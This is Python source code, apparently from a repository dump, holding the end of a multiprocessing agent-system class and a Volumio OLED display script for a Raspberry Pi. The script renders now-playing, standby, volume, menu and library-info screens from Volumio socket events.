p = Process(target=agent.run)
p.start()
processes.append(p)
return processes
def join(self):
"""
Join with all processes that have been launched.
"""
for process in self.processes:
process.join()
def start(self):
"""
        Start the system by sending the configuration object to each agent process.
"""
for x in range(len(self.processes)):
self.mailbox.send(x, self.config)
def shutdown_agents(self):
"""
Wait for all mailbox messages to be processed, then send quit messages
to all processes and join with all processes. This will block until
all agents have terminated.
"""
print("System waiting for mailbox to go inactive...")
# Sleep a bit to allow any actions based on timeouts to fire.
#time.sleep(10)
self.mailbox.join()
print("System shutting down agents...")
for x in range(len(self.processes)):
self.mailbox.send(x, "quit")
self.join()
def quit(self):
self.logger.log_result("quit", None, None)
self.logger_process.join()
self.mailbox.quit()
self.mailbox_process.join()
print("System terminated.")
|
oledui-nightly.py
|
#!/usr/bin/python
from __future__ import unicode_literals
import requests
import os
import sys
import time
import json
import pycurl
import pprint
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
from time import *
from threading import Thread
from socketIO_client import SocketIO
from datetime import datetime
from io import BytesIO
# Imports for OLED display
from luma.core.interface.serial import spi
from luma.oled.device import ssd1322
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from modules.pushbutton import PushButton
from modules.rotaryencoder import RotaryEncoder
from modules.display import *
volumio_host = 'localhost'
volumio_port = 3000
VOLUME_DT = 5 #volume adjustment step
volumioIO = SocketIO(volumio_host, volumio_port)
#imports for REST API (MediaInfoScreen)
b_obj = BytesIO()
crl = pycurl.Curl()
STATE_NONE = -1
STATE_PLAYER = 0
STATE_PLAYLIST_MENU = 1
STATE_QUEUE_MENU = 2
STATE_VOLUME = 3
STATE_SHOW_INFO = 4
STATE_LIBRARY_MENU = 5
STATE_LIBRARY_INFO = 6
UPDATE_INTERVAL = 0.034
PIXEL_SHIFT_TIME = 120 #time between picture position shifts in sec.
interface = spi(device=0, port=0)
oled = ssd1322(interface, rotate=2)
#without rotate the display is at 0 degrees, with rotate=2 it's rotated 180 degrees
oled.WIDTH = 256
oled.HEIGHT = 64
oled.state = 'stop'
oled.stateTimeout = 0
oled.timeOutRunning = False
oled.activeSong = ''
oled.activeArtist = 'VOLuMIO'
oled.playState = 'unknown'
oled.playPosition = 0
oled.modal = False
oled.playlistoptions = []
oled.queue = []
oled.libraryFull = []
oled.libraryNames = []
oled.volumeControlDisabled = True
oled.volume = 100
now = datetime.now() #current date and time
oled.time = now.strftime("%H:%M:%S") #resolves time as HH:MM:SS eg. 14:33:15
oled.date = now.strftime("%d. %m. %Y") #resolves time as dd.mm.YYYY eg. 17.04.2020
oled.IP = os.popen('ip addr show eth0').read().split("inet ")[1].split("/")[0] #resolves IP from Ethernet Adapator
emit_volume = False
emit_track = False
newStatus = 0 #makes newStatus usable outside of onPushState
oled.activeFormat = '' #makes oled.activeFormat globaly usable
oled.activeSamplerate = '' #makes oled.activeSamplerate globaly usable
oled.activeBitdepth = '' #makes oled.activeBitdepth globaly usable
oled.activeArtists = '' #makes oled.activeArtists globaly usable
oled.activeAlbums = '' #makes oled.activeAlbums globaly usable
oled.activeSongs = '' #makes oled.activeSongs globaly usable
oled.activePlaytime = '' #makes oled.activePlaytime globaly usable
oled.Art = 'Interpreten :' #sets the Artists-text for the MediaLibrarayInfo
oled.Alb = 'Alben :' #sets the Albums-text for the MediaLibrarayInfo
oled.Son = 'Songs :' #sets the Songs-text for the MediaLibrarayInfo
oled.Pla = 'Playtime :' #sets the Playtime-text for the MediaLibrarayInfo
oled.randomTag = False #helper to detect if "Random/shuffle" is set
oled.repeatTag = False #helper to detect if "repeat" is set
oled.ShutdownFlag = False #helper to detect if "shutdown" is running. Prevents artifacts from Standby-Screen during shutdown
oled.libraryInfo = '\U0001F4D6'
oled.libraryReturn = '\u2302'
oled.playIcon = '\u25B6'
oled.pauseIcon = '\u2389'
oled.stopIcon = '\u25A0'
oled.nextIcon = '\u23ED'
oled.prevIcon = '\u23EE'
oled.libraryIcon = '\uE003'
oled.playlistIcon = '\uE005'
oled.queueIcon = '\u2630'
oled.arrowUpIcon = '\U0000E75F'
oled.arrowDownIcon = '\U0000E75C'
oled.acceptIcon = '\u2713'
oled.discardIcon = '\u2715'
oled.randomIcon = '\U0001F500'
oled.repeatIcon = '\U0001F501'
oled.ArtistIcon = '\uF0F3'
oled.AlbumIcon = '\uF2BB'
oled.SongIcon = '\U0000F001'
oled.PlaytimeIcon = '\U0000F1DA'
image = Image.new('RGB', (oled.WIDTH, oled.HEIGHT)) #for Pixelshift: (oled.WIDTH + 4, oled.HEIGHT + 4))
oled.clear()
font = load_font('Oxanium-Bold.ttf', 20) #used for Artist
font2 = load_font('Oxanium-Light.ttf', 12) #used for all menus
font3 = load_font('Oxanium-Regular.ttf', 18) #used for Song
font4 = load_font('Oxanium-Medium.ttf', 12) #used for Format/Smplerate/Bitdepth
font5 = load_font('Oxanium-Medium.ttf', 11) #used for MediaLibraryInfo
hugefontaw = load_font('fa-solid-900.ttf', oled.HEIGHT - 4) #used for play/pause/stop icons -> Status change overlay
mediaicon = load_font('fa-solid-900.ttf', 10) #used for icon in Media-library info
iconfont = load_font('entypo.ttf', oled.HEIGHT) #used for play/pause/stop/shuffle/repeat... icons
labelfont = load_font('entypo.ttf', 16) #used for Menu-icons
labelfont2 = load_font('entypo.ttf', 12) #used for Menu-icons
iconfontBottom = load_font('entypo.ttf', 10) #used for icons under the screen / button layout
fontClock = load_font('DSG.ttf', 30) #used for clock
fontDate = load_font('DSEG7Classic-Regular.ttf', 10) #used for Date
fontIP = load_font('DSEG7Classic-Regular.ttf', 10) #used for IP
#above are the "imports" for the fonts.
#After the name of the font comes a number, this defines the Size (height) of the letters.
#Just put .ttf file in the 'Volumio-OledUI/fonts' directory and make an import like above.
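#Example (illustrative): fontBig = load_font('Oxanium-Bold.ttf', 28)  #a hypothetical larger variant for headlines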
def display_update_service():
pixshift = [2, 2]
lastshift = prevTime = time()
while UPDATE_INTERVAL > 0:
dt = time() - prevTime
prevTime = time()
# auto return to home display screen (from volume display / queue list..)
if oled.stateTimeout > 0:
oled.timeOutRunning = True
oled.stateTimeout -= dt
elif oled.stateTimeout <= 0 and oled.timeOutRunning:
oled.timeOutRunning = False
oled.stateTimeout = 0
SetState(STATE_PLAYER)
image.paste("black", [0, 0, image.size[0], image.size[1]])
try:
oled.modal.DrawOn(image)
except AttributeError:
print "render error"
sleep(1)
cimg = image.crop((pixshift[0], pixshift[1], pixshift[0] + oled.WIDTH, pixshift[1] + oled.HEIGHT))
oled.display(cimg)
sleep(UPDATE_INTERVAL)
#Example of SetState usage:
#oled.modal = NowPlayingScreen(oled.HEIGHT, oled.WIDTH, oled.activeArtist, oled.activeSong, oled.time, oled.IP, font, hugefontaw, fontClock)
#Here you define which variables the class (following below) should use:
#simply list which "data" (e.g. oled.IP...) you want to display, followed by the fonts you want to use.
#Hint: the "data" arguments map to row1, row2, ... in the classes; the first "data" is row1 and so on:
#oled.activeArtist = row1 / oled.activeSong = row2 ....
def SetState(status):
oled.state = status
if oled.state == STATE_PLAYER:
oled.modal = NowPlayingScreen(oled.HEIGHT, oled.WIDTH, oled.activeArtist, oled.activeSong, oled.time, oled.IP, oled.date, oled.activeFormat, oled.activeSamplerate, oled.activeBitdepth, oled.playIcon, oled.pauseIcon, oled.stopIcon, oled.prevIcon, oled.nextIcon, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryInfo, font, fontClock, fontDate, fontIP, font3, font4, iconfont, iconfontBottom)
oled.modal.SetPlayingIcon(oled.playState, 0)
elif oled.state == STATE_VOLUME:
oled.modal = VolumeScreen(oled.HEIGHT, oled.WIDTH, oled.volume, font, font2)
elif oled.state == STATE_PLAYLIST_MENU:
oled.modal = MenuScreen(oled.HEIGHT, oled.WIDTH, font2, iconfontBottom, labelfont, oled.playlistoptions, oled.arrowUpIcon, oled.arrowDownIcon, oled.acceptIcon, oled.discardIcon, rows=3, label='\uE005')
elif oled.state == STATE_QUEUE_MENU:
oled.modal = MenuScreen(oled.HEIGHT, oled.WIDTH, font2, iconfontBottom, labelfont, oled.queue, oled.arrowUpIcon, oled.arrowDownIcon, oled.acceptIcon, oled.discardIcon, rows=3, selected=oled.playPosition, showIndex=True, label='\u2630')
elif oled.state == STATE_LIBRARY_MENU:
oled.modal = MenuScreen(oled.HEIGHT, oled.WIDTH, font2, iconfontBottom, labelfont, oled.libraryNames, oled.arrowUpIcon, oled.arrowDownIcon, oled.acceptIcon, oled.discardIcon, rows=3, label='\uE003')
elif oled.state == STATE_LIBRARY_INFO:
oled.modal = MediaLibrarayInfo(oled.HEIGHT, oled.WIDTH, oled.activeArtists, oled.activeAlbums, oled.activeSongs, oled.activePlaytime, oled.Art, oled.Alb, oled.Son, oled.Pla, oled.libraryInfo, oled.libraryReturn, oled.ArtistIcon, oled.AlbumIcon, oled.SongIcon, oled.PlaytimeIcon, hugefontaw, font5, iconfontBottom, labelfont, labelfont2, mediaicon)
def LoadPlaylist(playlistname):
print ("loading playlist: " + playlistname.encode('ascii', 'ignore'))
oled.playPosition = 0
volumioIO.emit('playPlaylist', {'name':playlistname})
SetState(STATE_PLAYER)
#In 'onPushState' the whole set of media information is bound to the variables (e.g. artist, song...).
#On every change in playback (pause, another track, etc.) Volumio pushes a set of information on port 3000.
#Volumio-OledUI is always listening on this port; whenever new 'data' arrives, "def onPushState(data):" runs again.
def onPushState(data):
# print(data) #for log, if enabled you see the values for 'data'
    global OPDsave
    global newStatus #global definition for newStatus, used at the end-loop to update standby
    OPDsave = data
if 'title' in data:
newSong = data['title']
else:
newSong = ''
if newSong is None:
newSong = ''
if 'artist' in data:
newArtist = data['artist']
else:
newArtist = ''
if newArtist is None: #volumio can push NoneType
newArtist = ''
if 'stream' in data:
newFormat = data['stream']
else:
newFormat = ''
if newFormat is None:
newFormat = ''
if newFormat == True:
newFormat = 'WebRadio'
    #If a stream (like webradio) is playing, the value pushed for 'stream'/newFormat is a boolean (True).
    #DrawOn can't handle that and raises an error,
    #therefore we use "if newFormat == True:" and define a placeholder word; you can change it.
if 'samplerate' in data:
newSamplerate = data['samplerate']
else:
newSamplerate = ' '
if newSamplerate is None:
newSamplerate = ' '
if 'bitdepth' in data:
newBitdepth = data['bitdepth']
else:
newBitdepth = ' '
if newBitdepth is None:
newBitdepth = ' '
if 'position' in data: # current position in queue
oled.playPosition = data['position'] # didn't work well with volumio ver. < 2.5
if 'status' in data:
newStatus = data['status']
if oled.state != STATE_VOLUME: #get volume on startup and remote control
try: #it is either number or unicode text
oled.volume = int(data['volume'])
except (KeyError, ValueError):
pass
if 'disableVolumeControl' in data:
oled.volumeControlDisabled = data['disableVolumeControl']
oled.activeFormat = newFormat
oled.activeSamplerate = newSamplerate
oled.activeBitdepth = newBitdepth
print(newSong.encode('ascii', 'ignore'))
if (newSong != oled.activeSong) or (newArtist != oled.activeArtist): # new song and artist
oled.activeSong = newSong
oled.activeArtist = newArtist
if oled.state == STATE_PLAYER and newStatus != 'stop': #this is the "NowPlayingScreen"
oled.modal.UpdatePlayingInfo(newArtist, newSong, newFormat, newSamplerate, newBitdepth, oled.playIcon, oled.pauseIcon, oled.stopIcon, oled.prevIcon, oled.nextIcon) #here is defined which "data" should be displayed in the class
if oled.state == STATE_PLAYER and newStatus == 'stop': #this is the "Standby-Screen"
oled.modal.UpdateStandbyInfo(oled.time, oled.IP, oled.date, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryInfo) #here is defined which "data" should be displayed in the class
if newStatus != oled.playState:
oled.playState = newStatus
if oled.state == STATE_PLAYER:
if oled.playState == 'play':
iconTime = 35
else:
iconTime = 80
oled.modal.SetPlayingIcon(oled.playState, iconTime)
def onPushCollectionStats(data):
data = json.loads(data) #data import from REST-API (is set when ButtonD short-pressed in Standby)
if "artists" in data: #used for Media-Library-Infoscreen
newArtists = data["artists"]
else:
newArtists = ''
if newArtists is None:
newArtists = ''
if 'albums' in data: #used for Media-Library-Infoscreen
newAlbums = data["albums"]
else:
newAlbums = ''
if newAlbums is None:
newAlbums = ''
if 'songs' in data: #used for Media-Library-Infoscreen
newSongs = data["songs"]
else:
newSongs = ''
if newSongs is None:
newSongs = ''
if 'playtime' in data: #used for Media-Library-Infoscreen
newPlaytime = data["playtime"]
else:
newPlaytime = ''
if newPlaytime is None:
newPlaytime = ''
oled.activeArtists = str(newArtists)
oled.activeAlbums = str(newAlbums)
oled.activeSongs = str(newSongs)
oled.activePlaytime = str(newPlaytime)
if oled.state == STATE_LIBRARY_INFO and oled.playState == 'info': #this is the "Media-Library-Info-Screen"
oled.modal.UpdateLibraryInfo(oled.activeArtists, oled.activeAlbums, oled.activeSongs, oled.activePlaytime, oled.Art, oled.Alb, oled.Son, oled.Pla, oled.libraryIcon, oled.playlistIcon, oled.queueIcon, oled.libraryReturn)
def onPushQueue(data):
oled.queue = [track['name'] if 'name' in track else 'no track' for track in data]
print('Queue length is ' + str(len(oled.queue)))
def onPushBrowseSources(data):
# print('Browse sources:')
# for item in data:
# print(item['uri'])
pass
def onLibraryBrowse(data):
oled.libraryFull = data
itemList = oled.libraryFull['navigation']['lists'][0]['items']
oled.libraryNames = [item['title'] if 'title' in item else 'empty' for item in itemList]
SetState(STATE_LIBRARY_MENU)
def EnterLibraryItem(itemNo):
selectedItem = oled.libraryFull['navigation']['lists'][0]['items'][itemNo]
print("Entering library item: " + oled.libraryNames[itemNo].encode('ascii', 'ignore'))
if selectedItem['type'][-8:] == 'category' or selectedItem['type'] == 'folder':
volumioIO.emit('browseLibrary',{'uri':selectedItem['uri']})
else:
print("Sending new Queue")
volumioIO.emit('clearQueue') #clear queue and add whole list of items
oled.queue = []
volumioIO.emit('addToQueue', oled.libraryFull['navigation']['lists'][0]['items'])
oled.stateTimeout = 5.0 #maximum time to load new queue
while len(oled.queue) == 0 and oled.stateTimeout > 0.1:
sleep(0.1)
oled.stateTimeout = 0.2
print("Play position = " + str(itemNo))
volumioIO.emit('play', {'value':itemNo})
def LibraryReturn(): #go to parent category
if not 'prev' in oled.libraryFull['navigation']:
SetState(STATE_PLAYER)
else:
parentCategory = oled.libraryFull['navigation']['prev']['uri']
print ("Navigating to parent category in library: " + parentCategory.encode('ascii', 'ignore'))
if parentCategory != '' and parentCategory != '/':
volumioIO.emit('browseLibrary',{'uri':parentCategory})
else:
SetState(STATE_PLAYER)
def onPushListPlaylist(data):
global oled
if len(data) > 0:
oled.playlistoptions = data
#If you want to add more text positions: double-check whether you are using STATIC or SCROLL text.
#A new position needs to be declared twice, first in "self.playingText..." AND under "def UpdatePlayingInfo" or "def UpdateStandbyInfo" (see the sketch below).
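#Illustrative sketch (names like playingText11/row18/text18Pos are hypothetical; the pattern mirrors the existing entries):
#  in __init__:          self.playingText11 = StaticText(self.height, self.width, row18, font4)
#                        self.text18Pos = (42, 30)
#  in UpdatePlayingInfo: self.playingText11 = StaticText(self.height, self.width, row18, font4)
#  in DrawOn:            self.playingText11.DrawOn(image, self.text18Pos)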
class NowPlayingScreen():
def __init__(self, height, width, row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12, row13, row14, row15, row16, row17, font, fontClock, fontDate, fontIP, font3, font4, iconfont, iconfontBottom): #this line references to oled.modal = NowPlayingScreen
self.height = height
self.width = width
self.font = font
self.font3 = font3
self.font4 = font4
self.iconfont = iconfont
self.icontfontBottom = iconfontBottom
self.fontClock = fontClock
self.fontDate = fontDate
self.fontIP = fontIP
self.playingText1 = ScrollText(self.height, self.width, row1, font) #Artist /center=True
self.playingText2 = ScrollText(self.height, self.width, row2, font3) #Title
self.playingText3 = StaticText(self.height, self.width, row6, font4) #format / flac,MP3...
self.playingText4 = StaticText(self.height, self.width, row7, font4) #samplerate / 44100
self.playingText5 = StaticText(self.height, self.width, row8, font4) #bitdepth /16 Bit
self.playingText6 = StaticText(self.height, self.width, row9, iconfontBottom) #PlayIcon
self.playingText7 = StaticText(self.height, self.width, row10, iconfontBottom) #PauseIcon
self.playingText8 = StaticText(self.height, self.width, row11, iconfontBottom) #StopIcon
self.playingText9 = StaticText(self.height, self.width, row12, iconfontBottom) #PreviousIcon
self.playingText10 = StaticText(self.height, self.width, row13, iconfontBottom) #NextIcon
self.standbyText1 = StaticText(self.height, self.width, row3, fontClock) #Clock /center=True
self.standbyText2 = StaticText(self.height, self.width, row4, fontIP) #IP
self.standbyText3 = StaticText(self.height, self.width, row5, fontDate) #Date
self.standbyText4 = StaticText(self.height, self.width, row14, iconfontBottom) #LibraryIcon
self.standbyText5 = StaticText(self.height, self.width, row15, iconfontBottom) #PlaylistIcon
self.standbyText6 = StaticText(self.height, self.width, row16, iconfontBottom) #QueueIcon
self.standbyText7 = StaticText(self.height, self.width, row17, iconfontBottom) #LibraryInfoIcon
self.icon = {'play':'\u25B6', 'pause':'\u2389', 'stop':'\u25A0'} #entypo icons
self.playingIcon = self.icon['play']
self.iconcountdown = 0
self.text1Pos = (42, 2) #Artist /
self.text2Pos = (42, 22) #Title
        self.text3Pos = (73, 4) #clock (clock text is 161 px wide; (222 px viewable - 161) / 2 + 42 offset = ~73)
self.text4Pos = (42, 41) #IP
self.text5Pos = (184, 41) #Date
self.text6Pos = (42, 41) #format
self.text7Pos = (156, 41) #samplerate
self.text8Pos = (217, 41) #bitdepth
self.text9Pos = (52, 54) #PlayIcon
self.text10Pos = (62, 54) #PauseIcon
self.text11Pos = (109, 54) #StopIcon
self.text12Pos = (194, 54) #PreviousIcon
self.text13Pos = (241, 54) #NextIcon
self.text14Pos = (57, 54) #LibraryIcon
self.text15Pos = (109, 54) #PlaylistIcon
self.text16Pos = (194, 54) #QueueIcon
self.text17Pos = (241, 54) #LibraryInfoIcon
self.alfaimage = Image.new('RGBA', image.size, (0, 0, 0, 0))
# "def __init__(self,...." is the "initialization" of the "NowPlayingScreen".
#Here you need to define the variables, which "data-string" is which textposition, where each textposition is displayed in the display...
def UpdatePlayingInfo(self, row1, row2, row6, row7, row8, row9, row10, row11, row12, row13):
self.playingText1 = ScrollText(self.height, self.width, row1, font) #Artist/ center=True)
self.playingText2 = ScrollText(self.height, self.width, row2, font3) #Title
self.playingText3 = StaticText(self.height, self.width, row6, font4) #format
self.playingText4 = StaticText(self.height, self.width, row7, font4) #samplerate
self.playingText5 = StaticText(self.height, self.width, row8, font4) #bitdepth
self.playingText6 = StaticText(self.height, self.width, row9, iconfontBottom) #PlayIcon
self.playingText7 = StaticText(self.height, self.width, row10, iconfontBottom) #PauseIcon
self.playingText8 = StaticText(self.height, self.width, row11, iconfontBottom) #StopIcon
self.playingText9 = StaticText(self.height, self.width, row12, iconfontBottom) #PreviousIcon
self.playingText10 = StaticText(self.height, self.width, row13, iconfontBottom) #NextIcon
def UpdateStandbyInfo(self, row3, row4, row5, row14, row15, row16, row17):
self.standbyText1 = StaticText(self.height, self.width, row3, fontClock) #Clock center=True)
self.standbyText2 = StaticText(self.height, self.width, row4, fontIP) #IP
self.standbyText3 = StaticText(self.height, self.width, row5, fontDate) #Date
self.standbyText4 = StaticText(self.height, self.width, row14, iconfontBottom) #LibraryIcon
self.standbyText5 = StaticText(self.height, self.width, row15, iconfontBottom) #PlaylistIcon
self.standbyText6 = StaticText(self.height, self.width, row16, iconfontBottom) #QueueIcon
self.standbyText7 = StaticText(self.height, self.width, row17, iconfontBottom) #LibraryInfoIcon
#"def UpdateStandbyInfo" and "def UpdatePlayingInfo" collects the informations.
# "def DrawON(..." takes informations from above and creates a "picture" which then is transfered to your display
def DrawOn(self, image):
if self.playingIcon != self.icon['stop']:
self.playingText1.DrawOn(image, self.text1Pos) #Artist
self.playingText2.DrawOn(image, self.text2Pos) #Title
self.playingText3.DrawOn(image, self.text6Pos) #Format
self.playingText4.DrawOn(image, self.text7Pos) #Samplerate
self.playingText5.DrawOn(image, self.text8Pos) #Bitdepth
self.playingText6.DrawOn(image, self.text9Pos) #play
self.playingText7.DrawOn(image, self.text10Pos) #pause
self.playingText8.DrawOn(image, self.text11Pos) #stop
self.playingText9.DrawOn(image, self.text12Pos) #previous
self.playingText10.DrawOn(image, self.text13Pos) #next
if self.playingIcon == self.icon['stop']:
self.standbyText1.DrawOn(image, self.text3Pos) #Clock
self.standbyText2.DrawOn(image, self.text4Pos) #IP
self.standbyText3.DrawOn(image, self.text5Pos) #Date
self.standbyText4.DrawOn(image, self.text14Pos) #library
self.standbyText5.DrawOn(image, self.text15Pos) #playlist
self.standbyText6.DrawOn(image, self.text16Pos) #queue
self.standbyText7.DrawOn(image, self.text17Pos) #libraryInfo
if self.iconcountdown > 0:
compositeimage = Image.composite(self.alfaimage, image.convert('RGBA'), self.alfaimage)
image.paste(compositeimage.convert('RGB'), (0, 0))
self.iconcountdown -= 1
def SetPlayingIcon(self, state, time=0):
if state in self.icon:
self.playingIcon = self.icon[state]
self.alfaimage.paste((0, 0, 0, 200), [0, 0, image.size[0], image.size[1]]) #(0, 0, 0, 200) means Background (nowplayingscreen with artist, song etc.) is darkend. Change 200 to 0 -> Background is completely visible. 255 -> Bachground is not visible. scale = 0-255
drawalfa = ImageDraw.Draw(self.alfaimage)
iconwidth, iconheight = drawalfa.textsize(self.playingIcon, font=self.iconfont) #entypo
left = (self.width - iconwidth + 42) / 2 #here is defined where the play/pause/stop icons are displayed.
drawalfa.text((left, 4), self.playingIcon, font=self.iconfont, fill=(255, 255, 255, 200)) #(255, 255, 255, 200) means Icon is nearly white. Change 200 to 0 -> icon is not visible. scale = 0-255
self.iconcountdown = time
class MediaLibrarayInfo():
    def __init__(self, height, width, row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12, row13, row14, fontaw, font5, iconfontBottom, labelfont, labelfont2, mediaicon): #this line references to oled.modal = MediaLibrarayInfo
self.height = height
self.width = width
self.font4 = font4
self.fontaw = fontaw
self.iconfontBottom = iconfontBottom
self.labelfont = labelfont
self.labelfont2 = labelfont2
self.mediaicon = mediaicon
self.LibraryInfoText1 = StaticText(self.height, self.width, row5, font4) #Text for Artists
self.LibraryInfoText2 = StaticText(self.height, self.width, row1, font4) #Number of Artists
self.LibraryInfoText3 = StaticText(self.height, self.width, row6, font4) #Text for Albums
self.LibraryInfoText4 = StaticText(self.height, self.width, row2, font4) #Number of Albums
self.LibraryInfoText5 = StaticText(self.height, self.width, row7, font4) #Text for Songs
self.LibraryInfoText6 = StaticText(self.height, self.width, row3, font4) #Number of Songs
self.LibraryInfoText7 = StaticText(self.height, self.width, row8, font4) #Text for duration
self.LibraryInfoText8 = StaticText(self.height, self.width, row4, font4) #Summary of duration
self.LibraryInfoText9 = StaticText(self.height, self.width, row9, labelfont2) #Menu-label Icon
self.LibraryInfoText10 = StaticText(self.height, self.width, row10, iconfontBottom) #LibraryInfo Return
self.LibraryInfoText11 = StaticText(self.height, self.width, row11, mediaicon) #icon for Artists
self.LibraryInfoText12 = StaticText(self.height, self.width, row12, mediaicon) #icon for Albums
self.LibraryInfoText13 = StaticText(self.height, self.width, row13, mediaicon) #icon for Songs
self.LibraryInfoText14 = StaticText(self.height, self.width, row14, mediaicon) #icon for duration
        self.icon = {'info':'\uF0CA'}
self.mediaIcon = self.icon['info']
self.iconcountdown = 0
self.text1Pos = (140, 2) #Number of Artists
        self.text2Pos = (140, 15) #Number of Albums
self.text3Pos = (140, 28) #Number of Songs
self.text4Pos = (140, 41) #Summary of duration
self.text5Pos = (56, 2) #Text for Artists
self.text6Pos = (56, 15) #Text for Albums
self.text7Pos = (56, 28) #Text for Songs
self.text8Pos = (56, 41) #Text for duration
self.text9Pos = (148, 52) #Menu-Label Icon
self.text10Pos = (241, 54) #LibraryInfoIcon
self.text11Pos = (42, 2) #icon for Artists
self.text12Pos = (42, 15) #icon for Albums
self.text13Pos = (42, 28) #icon for Songs
self.text14Pos = (42, 41) #icon for duration
self.alfaimage = Image.new('RGBA', image.size, (0, 0, 0, 0))
def UpdateLibraryInfo(self, row1, row2, row3, row4, row5, row6, row7, row8, row9, row10, row11, row12, row13, row14):
self.LibraryInfoText1 = StaticText(self.height, self.width, row5, font4) #Text for Artists
self.LibraryInfoText2 = StaticText(self.height, self.width, row1, font4) #Number of Artists
self.LibraryInfoText3 = StaticText(self.height, self.width, row6, font4) #Text for Albums
self.LibraryInfoText4 = StaticText(self.height, self.width, row2, font4) #Number of Albums
self.LibraryInfoText5 = StaticText(self.height, self.width, row7, font4) #Text for Songs
self.LibraryInfoText6 = StaticText(self.height, self.width, row3, font4) #Number of Songs
self.LibraryInfoText7 = StaticText(self.height, self.width, row8, font4) #Text for duration
self.LibraryInfoText8 = StaticText(self.height, self.width, row4, font4) #Summary of duration
self.LibraryInfoText9 = StaticText(self.height, self.width, row9, labelfont2) #Menu-label Icon
self.LibraryInfoText10 = StaticText(self.height, self.width, row10, iconfontBottom) #LibraryInfo Return
self.LibraryInfoText11 = StaticText(self.height, self.width, row11, mediaicon) #icon for Artists
self.LibraryInfoText12 = StaticText(self.height, self.width, row12, mediaicon) #icon for Albums
self.LibraryInfoText13 = StaticText(self.height, self.width, row13, mediaicon) #icon for Songs
self.LibraryInfoText14 = StaticText(self.height, self.width, row14, mediaicon) #icon for duration
def DrawOn(self, image):
if self.mediaIcon == self.icon['info']:
self.LibraryInfoText1.DrawOn(image, self.text5Pos) #Text for Artists
self.LibraryInfoText2.DrawOn(image, self.text1Pos) #Number of Artists
self.LibraryInfoText3.DrawOn(image, self.text6Pos) #Text for Albums
self.LibraryInfoText4.DrawOn(image, self.text2Pos) #Number of Albums
self.LibraryInfoText5.DrawOn(image, self.text7Pos) #Text for Songs
self.LibraryInfoText6.DrawOn(image, self.text3Pos) #Number of Songs
self.LibraryInfoText7.DrawOn(image, self.text8Pos) #Text for duration
self.LibraryInfoText8.DrawOn(image, self.text4Pos) #Number of duration
self.LibraryInfoText9.DrawOn(image, self.text9Pos) #menulabelIcon
self.LibraryInfoText10.DrawOn(image, self.text10Pos) #LibraryInfo Return
self.LibraryInfoText11.DrawOn(image, self.text11Pos) #icon for Artists
self.LibraryInfoText12.DrawOn(image, self.text12Pos) #icon for Albums
self.LibraryInfoText13.DrawOn(image, self.text13Pos) #icon for Songs
self.LibraryInfoText14.DrawOn(image, self.text14Pos) #icon for duration
if self.iconcountdown > 0:
compositeimage = Image.composite(self.alfaimage, image.convert('RGBA'), self.alfaimage)
image.paste(compositeimage.convert('RGB'), (0, 0))
self.iconcountdown -= 1
def SetPlayingIcon(self, state, time=0):
if state in self.icon:
self.mediaIcon = self.icon[state]
self.alfaimage.paste((0, 0, 0, 0), [0, 0, image.size[0], image.size[1]])
drawalfa = ImageDraw.Draw(self.alfaimage)
            iconwidth, iconheight = drawalfa.textsize(self.mediaIcon, font=self.fontaw)
            left = (self.width - iconwidth + 42) / 2 #here is defined where the icon is displayed.
            drawalfa.text((left, 4), self.mediaIcon, font=self.fontaw, fill=(255, 255, 255, 96))
self.iconcountdown = time
class VolumeScreen():
def __init__(self, height, width, volume, font, font2):
self.height = height
self.width = width
self.font = font
self.font2 = font2
self.volumeLabel = None
self.labelPos = (40, 5)
self.volumeNumber = None
self.numberPos = (40, 25)
self.barHeight = 22
self.barWidth = 140
self.volumeBar = Bar(self.height, self.width, self.barHeight, self.barWidth)
self.barPos = (105, 27)
self.volume = 0
self.DisplayVolume(volume)
def DisplayVolume(self, volume):
self.volume = volume
self.volumeNumber = StaticText(self.height, self.width, str(volume) + '%', self.font)
self.volumeLabel = StaticText(self.height, self.width, 'Volume', self.font2)
self.volumeBar.SetFilledPercentage(volume)
def DrawOn(self, image):
self.volumeLabel.DrawOn(image, self.labelPos)
self.volumeNumber.DrawOn(image, self.numberPos)
self.volumeBar.DrawOn(image, self.barPos)
class MenuScreen():
def __init__(self, height, width, font2, iconfontBottom, labelfont, menuList, row1, row2, row3, row4, selected=0, rows=3, label='', showIndex=False):
self.height = height
self.width = width
self.font2 = font2
self.iconfontBottom = iconfontBottom
self.labelfont = labelfont
self.selectedOption = selected
self.row1 = row1
self.row2 = row2
self.row3 = row3
self.row4 = row4
self.menuLabel = StaticText(self.height, self.width, label, labelfont)
if label == '':
self.hasLabel = 0
else:
self.hasLabel = 1
self.labelPos = (148, 52) #here is the position of the menu label
self.menuYPos = 2 + 12 * self.hasLabel
self.menurows = rows
self.menuText = [None for i in range(self.menurows)]
self.Icon1 = StaticText(self.height, self.width, row1, iconfontBottom) #UpIcon
self.Icon2 = StaticText(self.height, self.width, row2, iconfontBottom) #DownlistIcon
self.Icon3 = StaticText(self.height, self.width, row4, iconfontBottom) #DiscardIcon
self.Icon4 = StaticText(self.height, self.width, row3, iconfontBottom) #AcceptInfoIcon
self.menuList = menuList
self.totaloptions = len(menuList)
self.onscreenoptions = min(self.menurows, self.totaloptions)
self.firstrowindex = 0
self.showIndex = showIndex
self.text1Pos = (57, 54) #UpIcon
self.text2Pos = (109, 54) #DownIcon
self.text3Pos = (194, 54) #DiscardIcon
self.text4Pos = (241, 54) #AcceptIcon
self.MenuUpdate()
def MenuUpdate(self):
self.firstrowindex = min(self.firstrowindex, self.selectedOption)
self.firstrowindex = max(self.firstrowindex, self.selectedOption - (self.menurows-1))
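        #Example: with menurows=3 and selectedOption=5, firstrowindex is pushed up to 3,
        #so the visible window shows options 3..5 and the selection stays on screen.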
for row in range(self.onscreenoptions):
if (self.firstrowindex + row) == self.selectedOption:
color = "black"
bgcolor = "white"
else:
color = "white"
bgcolor = "black"
optionText = self.menuList[row+self.firstrowindex]
if self.showIndex:
width = 1 + len(str(self.totaloptions)) # more digits needs more space
optionText = '{0:{width}d} {1}'.format(row + self.firstrowindex + 1, optionText, width=width)
self.menuText[row] = StaticText(self.height, self.width, optionText, self.font2, fill=color, bgcolor=bgcolor)
if self.totaloptions == 0:
self.menuText[0] = StaticText(self.height, self.width, 'no items..', self.font2, fill="white", bgcolor="black")
def NextOption(self):
